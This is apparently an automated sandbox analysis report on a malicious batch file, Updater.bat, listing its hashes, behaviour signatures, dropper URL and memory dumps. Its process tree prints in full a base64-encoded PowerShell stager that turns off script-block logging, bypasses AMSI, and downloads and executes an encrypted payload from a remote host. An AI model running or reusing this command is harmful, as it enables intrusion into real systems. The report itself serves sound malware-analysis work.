f0859a67360c4b3d070ecddda39dc918fe62601f2d66f5ef4d8a2498e8405774

General

Target

Updater.bat
Size

4KB
MD5

08df8c0b745d42d177f7f6879fd8af74
SHA1

4d04e058ee99d8c34275415d6347136fa60f5a07
SHA256

f0859a67360c4b3d070ecddda39dc918fe62601f2d66f5ef4d8a2498e8405774
SHA512

c519c28c75f355e1d887e0a73319143a8c7030698efda9b75d2b09cc793c0f224d35eec85bc93e99831527f0e4351272fa4c5f6b1970376d24f86cae83799eda
SSDEEP

96:FsKlFCY5x4m4IktAAT2okCRN0XpEIgGsmSLY4RAw+Gi+vYl+mZEhT:FpCPGEkCR+XOICL7pi4cy

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://192.168.1.71:80

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 2756	2132	cmd.exe	29
PID 2132 wrote to memory of 2756	2132	cmd.exe	29
PID 2132 wrote to memory of 2756	2132	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Updater.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAHIAUwBJAE8ATgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcARQB0AFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAEEAbAB1AGUAKAAkAE4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAG8AbABMAGUAYwB0AEkATwBuAHMALgBHAGUAbgBFAHIASQBDAC4ARABpAGMAdABJAG8ATgBBAHIAeQBbAHMAVABSAEkATgBnACwAUwBZAFMAdABlAG0ALgBPAEIAagBFAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAVgBBAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUATABTAGUAewBbAFMAYwByAEkAcAB0AEIAbABPAEMASwBdAC4AIgBHAEUAVABGAGkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAGwAdQBFACgAJABuAFUATABsACwAKABOAGUAdwAtAE8AYgBqAGUAYwBUACAAQwBvAGwATABlAEMAdABJAE8ATgBzAC4ARwBFAE4ARQBSAGkAQwAuAEgAYQBzAEgAUwBFAFQAWwBzAFQAUgBJAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBJAGUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAEwALAAkAFQAUgB1AGUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMARQBSAFYAaQBjAGUAUABvAGkAbgB0AE0AQQBOAEEAZwBFAHIAXQA6ADoARQBYAFAAZQBDAFQAMQAwADAAQwBPAG4AVABpAE4AVQBlAD0AMAA7ACQAVwBjAD0ATgBlAHcALQBPAEIAagBlAEMAVAAgAFMAWQBTAHQAZQBtAC4ATgBFAHQALgBXAEUAQgBDAEwASQBlAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQARQByAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAFgAWQA9AFsAUwBZAHMAdABFAG0ALgBOAEUAdAAuAFcARQBCAFIAZQBRAFUAZQBTAHQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwB4AFkAOwAkAFcAQwAuAFAAUgBPAHgAeQAuAEMAcgBFAEQAZQBuAHQASQBhAEwAUwAgAD0AIABbAFMAWQBTAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAGUAbgB0AGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAHUAbABUAE4AZQB0AHcATwBSAGsAQwBSAGUARABFAE4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABFAE0ALgBUAGUAWABUAC4ARQBuAGMAbwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQBUAEUAUwAoACcAXQBoAHEAMQBqACkAYwAjADwAWQA1AEYAUgA4AFgALwBCAHYAYQB3AHsAJgA2AC4ARQAhAD4ASwB+AHoATQAlACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA3ADEAOgA4ADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAVwBjAC4ASABlAGEARABFAFIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AagArAGYAdgA3AFMAMQBUAEEAcwBhAG4ASABsAHIAMwBzAGIARAB1AHIAbgBzAHkAZAByADQAPQAiACkAOwAkAEQAYQBUAEEAPQAkAFcAQwAuAEQATwB3AG4ATABvAGEARABEAEEAVABhACgAJABTAGUAcgArACQAdAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAQQBUAEEAPQAkAGQAQQB0AGEAWwA0AC4ALgAkAGQAQQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2756

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2756-4-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/2756-5-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/2756-6-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-7-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2756-8-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2756-9-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-10-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-11-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2756-12-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2756-13-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2756-14-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-15-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing